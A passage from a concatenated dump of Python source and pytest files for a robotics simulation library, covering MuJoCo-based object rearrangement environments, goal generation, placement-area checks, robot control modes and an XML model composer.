) -> dict:
for i in range(max_reset_retry_on_invalid_sim_error):
try:
if only_reset_goal:
obs = env.reset_goal()
else:
obs = env.reset()
except InvalidSimulationError:
if i == max_reset_retry_on_invalid_sim_error - 1:
raise RuntimeError(
f"Too many consecutive env reset error:"
f" {max_reset_retry_on_invalid_sim_error} times"
)
else:
break
return obs
def rotate_bounding_box(
bounding_box: np.ndarray, quat: np.ndarray
) -> Tuple[float, float]:
""" Rotates a bounding box by applying the quaternion and then re-computing the tightest
possible fit of an *axis-aligned* bounding box.
"""
pos, size = bounding_box
# Compute 8 corners of bounding box.
signs = np.array([[x, y, z] for x in [-1, 1] for y in [-1, 1] for z in [-1, 1]])
corners = pos + signs * size
assert corners.shape == (8, 3)
# Rotate corners.
mat = quat2mat(quat)
rotated_corners = corners @ mat
# Re-compute bounding-box.
min_xyz = np.min(rotated_corners, axis=0)
max_xyz = np.max(rotated_corners, axis=0)
size = (max_xyz - min_xyz) / 2.0
assert np.all(size >= 0.0)
pos = min_xyz + size
return pos, size
def update_object_z_coordinate(
position: np.ndarray,
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
) -> np.ndarray:
"""
Update object z position based on bounding box. In case an object is rotated, the z position of
object, which is computed to be on top of the table, can be invalidated. This method is
useful to update z position based on up-to-date bounding box information.
:param position: position of objects (num_objects, 3) where the second dimension of the
tensor corresponds to (x, y, z) world coordinates of each object.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:return: position of objects (num_objects, 3) with updated z coordinate
"""
table_pos, table_size, table_height = table_dimensions
n_objects = object_bounding_boxes.shape[0]
updated = position.copy()
for i in range(n_objects):
center, size = object_bounding_boxes[i]
updated[i, -1] = size[-1] - center[-1] + table_size[-1] + table_pos[-1]
return updated
```
#### File: datasets/envstates/utils.py
```python
from typing import Dict
from numpy.random.mtrand import RandomState
from robogym.envs.rearrange.datasets.objects.base import ObjectDataset
from robogym.utils.env_utils import get_function
def get_envstate_datasets(
dataset_config: Dict[str, dict],
object_datasets: Dict[str, ObjectDataset],
random_state: RandomState,
):
datasets = {}
for key in dataset_config:
datasets[key] = get_function(dataset_config[key])(
object_datasets=object_datasets, random_state=random_state
)
return datasets
```
#### File: datasets/objects/utils.py
```python
from typing import Dict
from numpy.random.mtrand import RandomState
from robogym.utils.env_utils import get_function
def get_object_datasets(object_config: Dict[str, dict], random_state: RandomState):
datasets = {}
for key in object_config:
datasets[key] = get_function(object_config[key])(random_state=random_state)
return datasets
```
#### File: rearrange/goals/object_stack_goal.py
```python
from typing import Dict, Tuple, Union
import numpy as np
from numpy.random import RandomState
from robogym.envs.rearrange.common.utils import place_objects_with_no_constraint
from robogym.envs.rearrange.goals.object_state import GoalArgs, ObjectStateGoal
from robogym.envs.rearrange.simulation.base import RearrangeSimulationInterface
from robogym.utils import rotation
class ObjectStackGoal(ObjectStateGoal):
def __init__(
self,
mujoco_simulation: RearrangeSimulationInterface,
args: Union[Dict, GoalArgs] = GoalArgs(),
fixed_order: bool = True,
):
"""
:param fixed_order: whether goal requires objects stacked in a random order.
"""
super().__init__(mujoco_simulation, args)
self.fixed_order = fixed_order
def _sample_next_goal_positions(
self, random_state: RandomState
) -> Tuple[np.ndarray, bool]:
# place only bottom object
bottom_positions, goal_valid = place_objects_with_no_constraint(
self.mujoco_simulation.get_object_bounding_boxes()[:1],
self.mujoco_simulation.get_table_dimensions(),
self.mujoco_simulation.get_placement_area(),
max_placement_trial_count=self.mujoco_simulation.max_placement_retry,
max_placement_trial_count_per_object=self.mujoco_simulation.max_placement_retry_per_object,
random_state=random_state,
)
goal_positions = np.repeat(
bottom_positions, self.mujoco_simulation.num_objects, axis=0
)
object_size = self.mujoco_simulation.simulation_params.object_size
block_orders = list(range(self.mujoco_simulation.num_objects))
if not self.fixed_order:
random_state.shuffle(block_orders)
bottom_block_idx = block_orders[0]
goal_positions[bottom_block_idx] = bottom_positions[0]
for i in range(1, self.mujoco_simulation.num_objects):
new_pos = bottom_positions[0].copy()
new_pos[2] += i * object_size * 2
goal_positions[block_orders[i]] = new_pos
return goal_positions, goal_valid
def is_object_grasped(self):
grasped = self.mujoco_simulation.get_object_gripper_contact()
# in teleop, somehow we could grasp object with mujoco detecting only one gripper touched the object.
return np.array([x[0] + x[1] for x in grasped])
def relative_goal(self, goal_state: dict, current_state: dict) -> dict:
gripper_pos = current_state["obj_pos"] - current_state["gripper_pos"]
obj_pos = goal_state["obj_pos"] - current_state["obj_pos"]
return {
"obj_pos": obj_pos,
"gripper_pos": gripper_pos,
"obj_rot": self.rot_dist_func(goal_state, current_state),
}
def current_state(self) -> dict:
gripper_pos = self.mujoco_simulation.mj_sim.data.get_site_xpos(
"robot0:grip"
).copy()
gripper_pos = np.array([gripper_pos])
current_state = super().current_state()
current_state.update(
{"gripper_pos": gripper_pos, "grasped": self.is_object_grasped()}
)
return current_state
def goal_distance(self, goal_state: dict, current_state: dict) -> dict:
relative_goal = self.relative_goal(goal_state, current_state)
pos_distances = np.linalg.norm(relative_goal["obj_pos"], axis=-1)
gripper_distances = np.linalg.norm(relative_goal["gripper_pos"], axis=-1)
rot_distances = rotation.quat_magnitude(
rotation.quat_normalize(rotation.euler2quat(relative_goal["obj_rot"]))
)
return {
"relative_goal": relative_goal.copy(),
"gripper_pos": gripper_distances,
"obj_pos": pos_distances,
"obj_rot": rot_distances,
"grasped": current_state["grasped"],
}
```
#### File: envs/rearrange/holdout.py
```python
import os
from typing import Dict, List, Optional, cast
import attr
import numpy as np
from robogym.envs.rearrange.common.base import (
RearrangeEnv,
RearrangeEnvConstants,
RearrangeEnvParameters,
)
from robogym.envs.rearrange.goals.holdout_object_state import (
HoldoutGoalArgs,
HoldoutObjectStateGoal,
)
from robogym.envs.rearrange.holdouts import STATE_DIR
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
from robogym.envs.rearrange.simulation.holdout import (
HoldoutRearrangeSim,
HoldoutRearrangeSimParameters,
)
from robogym.robot_env import build_nested_attr
@attr.s(auto_attribs=True)
class HoldoutRearrangeEnvConstants(RearrangeEnvConstants):
# Path to file storing initial state of objects.
# If not specified, initial state will be randomly sampled.
initial_state_path: Optional[str] = None
goal_args: HoldoutGoalArgs = build_nested_attr(HoldoutGoalArgs)
randomize_target: bool = False
@attr.s(auto_attribs=True)
class HoldoutRearrangeEnvParameters(RearrangeEnvParameters):
simulation_params: HoldoutRearrangeSimParameters = build_nested_attr(
HoldoutRearrangeSimParameters
)
# Hold out arg should use explicitly defined material without randomization.
material_names: Optional[List[str]] = attr.ib(default=cast(List[str], []))
@material_names.validator
def validate_material_names(self, _, value):
assert not value, (
"Specifying material names for holdout in parameters is not supported. "
"Please specify material in jsonnet config directly."
)
class HoldoutRearrangeEnv(
RearrangeEnv[
HoldoutRearrangeEnvParameters,
HoldoutRearrangeEnvConstants,
HoldoutRearrangeSim,
]
):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
# Create dummy object groups based on task object config so that reward
# function can take duplicated objects in holdouts into consideration.
object_groups = []
num_objects = self.parameters.simulation_params.num_objects
object_id = 0
for c in self.parameters.simulation_params.task_object_configs[:num_objects]:
object_group = ObjectGroupConfig(count=c.count)
# Set up object ids
object_group.object_ids = list(range(object_id, object_id + c.count))
object_id += c.count
object_groups.append(object_group)
return object_groups
def _sample_group_attributes(self, num_groups: int) -> Dict[str, list]:
# We don't set random attributes for object groups
return {}
def _apply_object_colors(self):
# We don't apply customized object colors.
pass
def _apply_object_size_scales(self):
# We don't apply customized object size scaling.
pass
def _randomize_object_initial_states(self):
if self.constants.initial_state_path:
initial_state = np.load(
os.path.join(STATE_DIR, self.constants.initial_state_path)
)
self.mujoco_simulation.set_object_pos(
initial_state["obj_pos"][: self.mujoco_simulation.num_objects]
)
self.mujoco_simulation.set_object_quat(
initial_state["obj_quat"][: self.mujoco_simulation.num_objects]
)
self.mujoco_simulation.forward()
else:
super()._randomize_object_initial_states()
@classmethod
def build_goal_generation(cls, constants, mujoco_simulation):
if constants.randomize_target:
return super().build_goal_generation(constants, mujoco_simulation)
else:
return HoldoutObjectStateGoal(mujoco_simulation, args=constants.goal_args)
make_env = HoldoutRearrangeEnv.build
```
#### File: rearrange/simulation/blocks.py
```python
import attr
from robogym.envs.rearrange.common.utils import (
get_block_bounding_box,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.base import (
RearrangeSimParameters,
RearrangeSimulationInterface,
)
@attr.s(auto_attribs=True)
class BlockRearrangeSimParameters(RearrangeSimParameters):
# Appearance of the block. 'standard' blocks have plane faces without any texture or mark.
# 'openai' blocks have ['O', 'P', 'E', 'N', 'A', 'I'] in each face.
block_appearance: str = attr.ib(
default="standard", validator=attr.validators.in_(["standard", "openai"])
)
class BlockRearrangeSim(RearrangeSimulationInterface[BlockRearrangeSimParameters]):
"""
Move around a blocks of different colors on the table.
"""
@classmethod
def make_objects_xml(cls, xml, simulation_params: BlockRearrangeSimParameters):
return make_blocks_and_targets(
simulation_params.num_objects,
simulation_params.object_size,
appearance=simulation_params.block_appearance,
)
def _get_bounding_box(self, object_name):
return get_block_bounding_box(self.mj_sim, object_name)
```
#### File: envs/rearrange/table_setting.py
```python
import logging
from typing import List
import attr
import numpy as np
from robogym.envs.rearrange.common.mesh import (
MeshRearrangeEnv,
MeshRearrangeEnvConstants,
MeshRearrangeEnvParameters,
MeshRearrangeSimParameters,
)
from robogym.envs.rearrange.goals.object_state_fixed import ObjectFixedStateGoal
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
from robogym.envs.rearrange.simulation.mesh import MeshRearrangeSim
from robogym.envs.rearrange.ycb import find_ycb_meshes
from robogym.robot_env import build_nested_attr
from robogym.utils.rotation import quat_from_angle_and_axis
logger = logging.getLogger(__name__)
@attr.s(auto_attribs=True)
class TableSettingRearrangeEnvParameters(MeshRearrangeEnvParameters):
simulation_params: MeshRearrangeSimParameters = build_nested_attr(
MeshRearrangeSimParameters, default=dict(num_objects=5)
)
class TableSettingRearrangeEnv(
MeshRearrangeEnv[
TableSettingRearrangeEnvParameters, MeshRearrangeEnvConstants, MeshRearrangeSim,
]
):
MESH_FILES = find_ycb_meshes()
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
return super()._sample_random_object_groups(dedupe_objects=True)
def _sample_object_colors(self, num_groups: int):
assert num_groups == 5
return [[0.99, 0.44, 0.35, 1.0]] + [[0.506, 0.675, 0.75, 1.0]] * 4
def _sample_object_size_scales(self, num_groups: int):
assert num_groups == 5
return [0.6, 0.53, 0.63, 0.6, 0.6]
def _sample_object_meshes(self, num_groups: int):
"""Add one plate, 2 forks, 1 spoon and 1 knife."""
return [
self.MESH_FILES[name]
for name in ["029_plate", "030_fork", "030_fork", "032_knife", "031_spoon"]
]
@classmethod
def build_goal_generation(cls, constants, mujoco_simulation):
return ObjectFixedStateGoal(
mujoco_simulation,
args=constants.goal_args,
relative_placements=np.array(
[
[0.6, 0.5], # "029_plate"
[0.6, 0.68], # "030_fork"
[0.6, 0.75], # "030_fork"
[0.6, 0.36], # "032_knife"
[0.6, 0.28], # "031_spoon"
]
),
init_quats=np.array(
[
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
# We need to rotate the spoon a little bit counter-clock-wise to be aligned with others.
quat_from_angle_and_axis(0.38, np.array([0, 0, 1.0])),
]
),
)
make_env = TableSettingRearrangeEnv.build
```
#### File: rearrange/tests/test_object_creation.py
```python
import numpy as np
from numpy.testing import assert_allclose
from robogym.envs.rearrange.common.utils import (
get_mesh_bounding_box,
make_block,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.composer import RandomMeshComposer
from robogym.mujoco.mujoco_xml import MujocoXML
def _get_default_xml():
xml_source = """
<mujoco>
<asset>
<material name="block_mat" specular="0" shininess="0.5" reflectance="0" rgba="1 0 0 1"></material>
</asset>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source)
return xml
def test_mesh_composer():
for path in [
None,
RandomMeshComposer.GEOM_ASSET_PATH,
RandomMeshComposer.GEOM_ASSET_PATH,
]:
composer = RandomMeshComposer(mesh_path=path)
for num_geoms in range(1, 6):
xml = _get_default_xml()
composer.reset()
xml.append(composer.sample("object0", num_geoms, object_size=0.05))
sim = xml.build()
assert len(sim.model.geom_names) == num_geoms
pos, size = get_mesh_bounding_box(sim, "object0")
assert np.isclose(np.max(size), 0.05)
pos2, size2 = composer.get_bounding_box(sim, "object0")
assert np.allclose(pos, pos2)
assert np.allclose(size, size2)
def test_block_object():
xml = _get_default_xml()
xml.append(make_block("object0", object_size=np.ones(3) * 0.05))
sim = xml.build()
assert len(sim.model.geom_size) == 1
assert_allclose(sim.model.geom_size, 0.05)
def test_blocks_and_targets():
xml = _get_default_xml()
for obj_xml, target_xml in make_blocks_and_targets(num_objects=5, block_size=0.05):
xml.append(obj_xml)
xml.append(target_xml)
sim = xml.build()
assert len(sim.model.geom_size) == 10
assert_allclose(sim.model.geom_size, 0.05)
```
#### File: rearrange/tests/test_object_in_placement_area.py
```python
import numpy as np
import pytest
from robogym.envs.rearrange.blocks import make_env
KEYS_TO_MASK = [
"goal_obj_pos",
"goal_obj_rot",
"rel_goal_obj_pos",
"rel_goal_obj_rot",
"obj_pos",
"obj_rot",
"obj_rel_pos",
"obj_vel_pos",
"obj_vel_rot",
"obj_gripper_contact",
"obj_bbox_size",
"obj_colors",
]
@pytest.mark.parametrize(
"obj_pos,in_placement_area,margin",
[
([[1.45, 0.68, 0.5]], [True], 0.02), # Center of placement area.
([[1.15, 0.39, 0.5]], [True], 0.02), # top left in boundary
([[1.10, 0.39, 0.5]], [False], 0.02), # top left out of boundary
(
[[1.10, 0.39, 0.5]],
[True],
0.1,
), # top left close to boundary with a big margin
([[1.75, 0.97, 0.5]], [True], 0.02), # bottom right in boundary
([[1.80, 1.0, 0.5]], [False], 0.02), # bottom right out of boundary
([[1.15, 0.97, 0.5]], [True], 0.02), # top right in boundary
([[1.10, 1.0, 0.5]], [False], 0.02), # top right out of boundary
([[1.75, 0.39, 0.5]], [True], 0.02), # bottom left in boundary
([[1.75, 0.36, 0.5]], [False], 0.02), # bottom left out of boundary
(
[[1.75, 0.36, 0.5]],
[True],
0.1,
), # bottom close to boundary with a big margin
# Some combinations
([[1.15, 0.39, 0.5], [1.10, 0.39, 0.5]], [True, False], 0.02),
([[1.80, 1.0, 0.5], [1.15, 0.97, 0.5]], [False, True], 0.02),
(
[[1.80, 1.0, 0.5], [1.10, 1.0, 0.5], [1.75, 0.39, 0.5]],
[False, False, True],
0.02,
),
],
)
def test_single_obj_in_placement_area(obj_pos, in_placement_area, margin):
in_placement_area = np.array(in_placement_area)
n_obj = len(obj_pos)
max_obj = 12
env = make_env(
parameters={
"simulation_params": {"num_objects": n_obj, "max_num_objects": max_obj}
},
)
env.reset()
sim = env.unwrapped.mujoco_simulation
assert np.array_equal(
in_placement_area,
sim.check_objects_in_placement_area(np.array(obj_pos), margin=margin),
)
obj_pos_with_padding = np.array(obj_pos + list(np.zeros((max_obj - n_obj, 3))))
assert obj_pos_with_padding.shape == (max_obj, 3)
with_padding = sim.check_objects_in_placement_area(
obj_pos_with_padding, margin=margin
)
assert len(with_padding) == max_obj
assert np.array_equal(in_placement_area, with_padding[:n_obj])
assert np.all(in_placement_area[n_obj:])
no_padding = sim.check_objects_in_placement_area(np.array(obj_pos), margin=margin)
assert len(no_padding) == len(obj_pos)
assert np.array_equal(in_placement_area, no_padding)
@pytest.mark.parametrize("should_mask", [True, False])
@pytest.mark.parametrize(
"obj_pos,in_placement_area",
[
([[1.45, 0.68, 0.5]], [True]),
([[1.15, 0.39, 0.5], [1.10, 0.39, 0.5]], [True, False]),
([[1.80, 1.0, 0.5], [1.15, 0.97, 0.5]], [False, True]),
([[1.80, 1.0, 0.5], [1.10, 1.0, 0.5], [1.75, 0.39, 0.5]], [False, False, True]),
],
)
def test_mask_observation(obj_pos, in_placement_area, should_mask):
n_obj = len(obj_pos)
obj_pos = np.array(obj_pos)
in_placement_area_padded = np.array(in_placement_area + [True] * (3 - n_obj))
expected_mask = in_placement_area_padded.astype(np.float).reshape(-1, 1)
env = make_env(
parameters={"simulation_params": {"num_objects": n_obj, "max_num_objects": 3}},
constants={"mask_obs_outside_placement_area": should_mask},
)
env.reset()
env.unwrapped.mujoco_simulation.set_object_pos(np.array(obj_pos))
env.unwrapped.mujoco_simulation.forward()
env.unwrapped._goal["goal_objects_in_placement_area"] = in_placement_area_padded
obs = env.observe()
sim = env.unwrapped.mujoco_simulation
assert in_placement_area == list(sim.check_objects_in_placement_area(obj_pos))
for k in KEYS_TO_MASK:
masked_k = f"masked_{k}"
if not should_mask:
assert masked_k not in obs
else:
assert np.array_equal(obs["placement_mask"], expected_mask)
assert np.array_equal(obs["goal_placement_mask"], expected_mask)
for i in range(n_obj):
if in_placement_area[i]:
assert np.all(obs[masked_k][i] == obs[k][i])
else:
# if outside the placement area, mask it.
assert np.all(obs[masked_k][i] == np.zeros_like(obs[k][i]))
@pytest.mark.parametrize(
"obj_pos,in_placement_area",
[
(
[
[1.45, 0.68, 0.5], # in the middle of the placement area
[1.45, 0.395, 0.5], # on the left edge
[1.45, 0.34, 0.5], # within the margin
[1.45, 0.25, 0.5],
], # outside the margin
[True, True, None, False],
)
],
)
def test_soft_mask_observation(obj_pos, in_placement_area):
env = make_env(parameters={"simulation_params": {"num_objects": len(obj_pos)}})
env.reset()
sim = env.unwrapped.mujoco_simulation
stochastic_mask = set()
for _ in range(20):
mask = sim.check_objects_in_placement_area(
np.array(obj_pos), soft=True, margin=0.1
)
for i in range(len(in_placement_area)):
if in_placement_area[i] is None:
stochastic_mask.add(mask[i])
else:
assert in_placement_area[i] == mask[i]
assert len(stochastic_mask) == 2
```
#### File: rearrange/tests/test_robot_polymorphism.py
```python
import pytest
from robogym.envs.rearrange.blocks import make_env
from robogym.robot.composite.ur_gripper_arm import (
MujocoIdealURGripperCompositeRobot as IdealDynamicsCls,
)
from robogym.robot.composite.ur_gripper_arm import (
MujocoURTcpJointGripperCompositeRobot as JointDynamicsCls,
)
from robogym.robot.robot_interface import (
ControlMode,
RobotControlParameters,
TcpSolverMode,
)
from robogym.robot.ur16e.mujoco.free_dof_tcp_arm import (
FreeRollYawTcpArm,
FreeWristTcpArm,
)
def test_rearrange_defaults():
from robogym.robot.composite.ur_gripper_arm import (
MujocoURTcpJointGripperCompositeRobot,
)
env = make_env()
assert isinstance(env.robot, MujocoURTcpJointGripperCompositeRobot)
assert (
env.parameters.robot_control_params.max_position_change
== RobotControlParameters.default_max_pos_change_for_solver(
control_mode=ControlMode.TCP_ROLL_YAW,
tcp_solver_mode=TcpSolverMode.MOCAP_IK,
)
)
assert env.parameters.robot_control_params.arm_reset_controller_error
assert env.parameters.robot_control_params.control_mode is ControlMode.TCP_ROLL_YAW
assert env.parameters.robot_control_params.tcp_solver_mode is TcpSolverMode.MOCAP_IK
assert env.action_space.shape == (6,)
@pytest.mark.parametrize(
"control_mode, expected_action_dims, tcp_solver_mode, expected_main_robot, expected_helper_arm",
[
(
ControlMode.TCP_WRIST,
5,
TcpSolverMode.MOCAP,
IdealDynamicsCls,
FreeWristTcpArm,
),
(
ControlMode.TCP_WRIST,
5,
TcpSolverMode.MOCAP_IK,
JointDynamicsCls,
FreeWristTcpArm,
),
(
ControlMode.TCP_ROLL_YAW,
6,
TcpSolverMode.MOCAP,
IdealDynamicsCls,
FreeRollYawTcpArm,
),
(
ControlMode.TCP_ROLL_YAW,
6,
TcpSolverMode.MOCAP_IK,
JointDynamicsCls,
FreeRollYawTcpArm,
),
],
)
def test_rearrange_with_ur_tcp(
control_mode,
expected_action_dims,
tcp_solver_mode,
expected_main_robot,
expected_helper_arm,
):
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=control_mode,
tcp_solver_mode=tcp_solver_mode,
max_position_change=0.1,
)
)
)
assert isinstance(env.robot, expected_main_robot)
assert isinstance(env.robot.robots[0].controller_arm, expected_helper_arm)
assert env.robot.robots[0].max_position_change == 0.1
assert env.robot.robots[1].max_position_change is None
assert env.action_space.shape == (expected_action_dims,)
assert env.robot.autostep is False, "Robot should not be in autostep mode"
def test_rearrange_sim_defaults():
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=ControlMode.TCP_WRIST, tcp_solver_mode=TcpSolverMode.MOCAP,
),
)
)
assert env.robot.autostep is False
arm_robot = env.robot.robots[0]
assert (
arm_robot.simulation == arm_robot.controller_arm.simulation
), "Simulation should be shared"
assert (
arm_robot.controller_arm.autostep is False
), "Controller arm is not allowed to autostep"
def test_rearrange_with_ur_joint():
from robogym.robot.composite.ur_gripper_arm import (
MujocoURJointGripperCompositeRobot,
)
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=ControlMode.JOINT, max_position_change=2.4,
)
)
)
assert isinstance(env.robot, MujocoURJointGripperCompositeRobot)
assert env.robot.robots[0].max_position_change == 2.4
assert env.robot.robots[1].max_position_change is None
assert env.parameters.robot_control_params.control_mode == ControlMode.JOINT
assert env.action_space.shape == (7,)
```
#### File: robogym/mujoco/mujoco_xml.py
```python
import os.path
import typing
import xml.etree.ElementTree as et
import mujoco_py
import numpy as np
ASSETS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../assets"))
XML_DIR = os.path.join(ASSETS_DIR, "xmls")
def _format_array(np_array, precision=6):
""" Format numpy array into a nice string suitable for mujoco XML """
if not isinstance(np_array, np.ndarray):
np_array = np.array(np_array, dtype=float)
# Make sure it's flattened
if len(np_array.shape) > 1:
np_array = np_array.reshape(-1)
if np.min(np.abs(np_array)) > 0.001:
format_str = "{:.%df}" % precision
else:
format_str = "{:.%de}" % precision
# Finally format a string out of numpy array
return " ".join(format_str.format(x) for x in np_array)
class StaleMjSimError(Exception):
"""
Exception indicating the MjSim instance is stale and should no longer be used.
"""
pass
class MjSim(mujoco_py.MjSim):
"""
There are environments e.g. rearrange environment which recreates
sim after reach env reset. This can cause potential bugs caused by
other components still caching instance of old sim. These bugs are usually
quite tricky to find. This class makes it easier to find these bugs by allowing
invalidating the sim instance so any access to properties of stale sim instance
will cause error.
"""
__slots__ = ("_stale", "_xml")
def __init__(self, model, **kwargs):
# Note: we don't need to call super.__init__ because MjSim use __cinit__
# for initialization which happens automatically before subclass __init__
# is called.
self._stale: bool = False
self._xml = model.get_xml()
def get_xml(self):
"""
Mujoco's internal get_xml() is unreliable as it seems to override the internal
memory buffer when more than one sim is instantiated. We therefore cache the model
xml on creation.
:return:
"""
return self._xml
def set_stale(self):
"""
Set this sim instance as stale so further access to properties of this
instance will raise error.
"""
self._stale = True
def is_stale(self):
return self._stale
@property
def data(self):
self._ensure_not_stale()
return super().data
@property
def model(self):
self._ensure_not_stale()
return super().model
def _ensure_not_stale(self):
if self._stale:
raise StaleMjSimError(
"You are accessing property of a stale sim instance which is no longer used"
"by the environment."
)
class MujocoXML:
"""
Class that combines multiple MuJoCo XML files into a single one.
"""
meshdir = os.path.join(ASSETS_DIR, "stls")
texturedir = os.path.join(ASSETS_DIR, "textures")
TEXTURE_ATTRIBUTES = [
"file",
"fileback" "filedown",
"filefront",
"fileleft",
"fileright",
"fileup",
]
NAMED_FIELDS = {
"actuator",
"body1",
"body2",
"childclass",
"class",
"geom",
"geom1",
"geom2",
"joint",
"joint1",
"joint2",
"jointparent",
"material",
"mesh",
"name",
"sidesite",
"site",
"source",
"target",
"tendon",
"texture",
}
###############################################################################################
# CONSTRUCTION
@classmethod
def parse(cls, xml_filename: str):
""" Parse given xml filename into the MujocoXML model """
xml_full_path = os.path.join(XML_DIR, xml_filename)
if not os.path.exists(xml_full_path):
raise Exception(xml_full_path)
with open(xml_full_path) as f:
xml_root = et.parse(f).getroot()
xml = cls(xml_root)
xml.load_includes(os.path.dirname(os.path.abspath(xml_full_path)))
return xml
@classmethod
def from_string(cls, contents: str):
""" Construct MujocoXML from string """
xml_root = et.XML(contents)
xml = cls(xml_root)
xml.load_includes()
return xml
def __init__(self, root_element: typing.Optional[et.Element] = None):
""" Create new MujocoXML class """
# This is the root element of the XML document we'll be modifying
if root_element is None:
# Create empty root element
self.root_element = et.Element("mujoco")
else:
# Initialize it from the existing thing
self.root_element = root_element
###############################################################################################
# COMBINING MUJOCO ELEMENTS
def add_default_compiler_directive(self):
""" Add a default compiler directive """
self.root_element.append(
et.Element(
"compiler",
{
"meshdir": self.meshdir,
"texturedir": self.texturedir,
"angle": "radian",
"coordinate": "local",
},
)
)
return self
def append(self, other: "MujocoXML"):
""" Append another XML object to this object """
self.root_element.extend(other.root_element)
return self
def xml_string(self):
""" Return combined XML as a string """
return et.tostring(self.root_element, encoding="unicode", method="xml")
def load_includes(self, include_root=""):
"""
Some mujoco files contain includes that need to be process on our side of the system
Find all elements that have an 'include' child
"""
for element in self.root_element.findall(".//include/.."):
# Remove in a second pass to avoid modifying list while iterating it
elements_to_remove_insert = []
for idx, subelement in enumerate(element):
if subelement.tag == "include":
# Branch off initial filename
include_path = os.path.join(include_root, subelement.get("file"))
include_element = MujocoXML.parse(include_path)
elements_to_remove_insert.append(
(idx, subelement, include_element.root_element)
)
# Iterate in reversed order to make sure indices are not screwed up
for idx, to_remove, to_insert in reversed(elements_to_remove_insert):
element.remove(to_remove)
to_insert_list = list(to_insert)
# Insert multiple elements
for i in range(len(to_insert)):
element.insert(idx + i, to_insert_list[i])
return self
def _resolve_asset_paths(self, meshdir, texturedir):
"""Resolve relative asset path in xml to local file path."""
for mesh in self.root_element.findall(".//mesh"):
fname = mesh.get("file")
if fname is not None:
if fname[0] != "/":
fname = os.path.join(meshdir or self.meshdir, fname)
mesh.set("file", fname)
for texture in self.root_element.findall(".//texture"):
for attribute in self.TEXTURE_ATTRIBUTES:
fname = texture.get(attribute)
if fname is not None:
if fname[0] != "/":
fname = os.path.join(texturedir or self.texturedir, fname)
texture.set(attribute, fname)
def build(self, output_filename=None, meshdir=None, texturedir=None, **kwargs):
""" Build and return a mujoco simulation """
self._resolve_asset_paths(meshdir, texturedir)
xml_string = self.xml_string()
if output_filename is not None:
with open(output_filename, "wt") as f:
f.write(xml_string)
mj_model = mujoco_py.load_model_from_xml(xml_string)
return MjSim(mj_model, **kwargs)
###############################################################################################
# MODIFICATIONS
def set_objects_attr(self, tag: str = "*", **kwargs):
""" Set given attribute to all instances of given tag within the tree """
for element in self.root_element.findall(".//{}".format(tag)):
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def set_objects_attrs(self, tag_args: dict):
"""
Batch version of set_objects_attr where args for multiple tags can be specified as a dict.
"""
for tag, args in tag_args.items():
self.set_objects_attr(tag=tag, **args)
def set_named_objects_attr(self, name: str, tag: str = "*", **kwargs):
""" Sets xml attributes of all objects with given name """
for element in self.root_element.findall(".//{}[@name='{}']".format(tag, name)):
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def set_prefixed_objects_attr(self, prefix: str, tag: str = "*", **kwargs):
""" Sets xml attributes of all objects with given name prefix """
for element in self.root_element.findall(".//{}[@name]".format(tag)):
if element.get("name").startswith(prefix): # type: ignore
for name, value in kwargs.items():
if isinstance(value, (list, np.ndarray)):
value = _format_array(value)
element.set(name, str(value))
return self
def add_name_prefix(self, name_prefix: str, exclude_attribs=[]):
"""
Add a given name prefix to all elements with "name" attribute.
Additionally, once we changed all "name" attributes we also have to change all
attribute fields that refer to those names.
"""
for element in self.root_element.iter():
for attrib_name in element.keys():
if (
attrib_name not in self.NAMED_FIELDS
or attrib_name in exclude_attribs
):
continue
element.set(attrib_name, name_prefix + element.get(attrib_name)) # type: ignore
return self
def replace_name(self, old_name: str, new_name: str, exclude_attribs=[]):
"""
Replace an old name string with an new name string in "name" attribute.
"""
for element in self.root_element.iter():
for attrib_name in element.keys():
if (
attrib_name not in self.NAMED_FIELDS
or attrib_name in exclude_attribs
):
continue
element.set(attrib_name, element.get(attrib_name).replace(old_name, new_name)) # type: ignore
return self
def remove_objects_by_tag(self, tag: str):
""" Remove objects with given tag from XML """
for element in self.root_element.findall(".//{}/..".format(tag)):
for subelement in list(element):
if subelement.tag != tag:
continue
assert subelement.tag == tag
element.remove(subelement)
return self
def remove_objects_by_prefix(self, prefix: str, tag: str = "*"):
""" Remove objects with given name prefix from XML """
for element in self.root_element.findall(".//{}[@name]/..".format(tag)):
for subelement in list(element):
if subelement.get("name").startswith(prefix): # type: ignore
element.remove(subelement)
return self
def remove_objects_by_name(
self, names: typing.Union[typing.List[str], str], tag: str = "*"
):
""" Remove object with given name from XML """
if isinstance(names, str):
names = [names]
for name in names:
for element in self.root_element.findall(
".//{}[@name='{}']/..".format(tag, name)
):
for subelement in list(element):
if subelement.get("name") == name:
element.remove(subelement)
return self
```
#### File: mujoco/test/test_mujoco_utils.py
```python
import random
import numpy as np
from mujoco_py import cymj, functions
from numpy.random.mtrand import _rand as global_randstate
from robogym.mujoco.forward_kinematics import ForwardKinematics
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.utils.rotation import uniform_quat
XML_BALL = """
<mujoco>
<worldbody>
<body name="ball">
<freejoint name="ball_joint"/>
<geom name="sphere" pos="0.00 0.00 0.00" type="sphere" size="0.1 0.1 0.1"/>
</body>
</worldbody>
